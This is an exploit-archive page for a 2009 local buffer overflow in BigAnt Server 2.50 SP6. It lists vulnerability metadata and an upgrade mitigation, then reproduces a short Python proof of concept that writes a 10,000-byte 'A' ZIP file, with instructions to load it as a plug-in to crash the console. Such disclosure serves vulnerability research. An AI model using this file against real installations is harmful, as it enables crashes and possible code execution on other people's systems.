header-logo
Suggest Exploit
vendor:
BigAnt Server
by:
Dr_IDE
9.3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: BigAnt Server
Affected Version From: 2.50 SP6
Affected Version To: 2.50 SP6
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2009

BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2

BigAnt Server version 2.50 SP6 is vulnerable to a local buffer overflow when a maliciously crafted ZIP file is opened. This can be exploited by an attacker to execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of BigAnt Server.
Source

Exploit-DB raw data:

#!/usr/bin/env python

########################################################################
#
# BigAnt Server <= 2.50 SP6 Local (ZIP File) Buffer Overflow PoC #2
# Found By: 	Dr_IDE
# Tested:   	XPSP3
# Usage:		Open BigAnt Console, Go to Plug-In, Add our zip, Boom.
#
########################################################################

buff = ("\x41" * 10000)

f1 = open("BigAntPlugIn.zip","w")
f1.write(buff)
f1.close()

# milw0rm.com [2009-09-21]

Navigation

Suggest Exploit

Services By CQR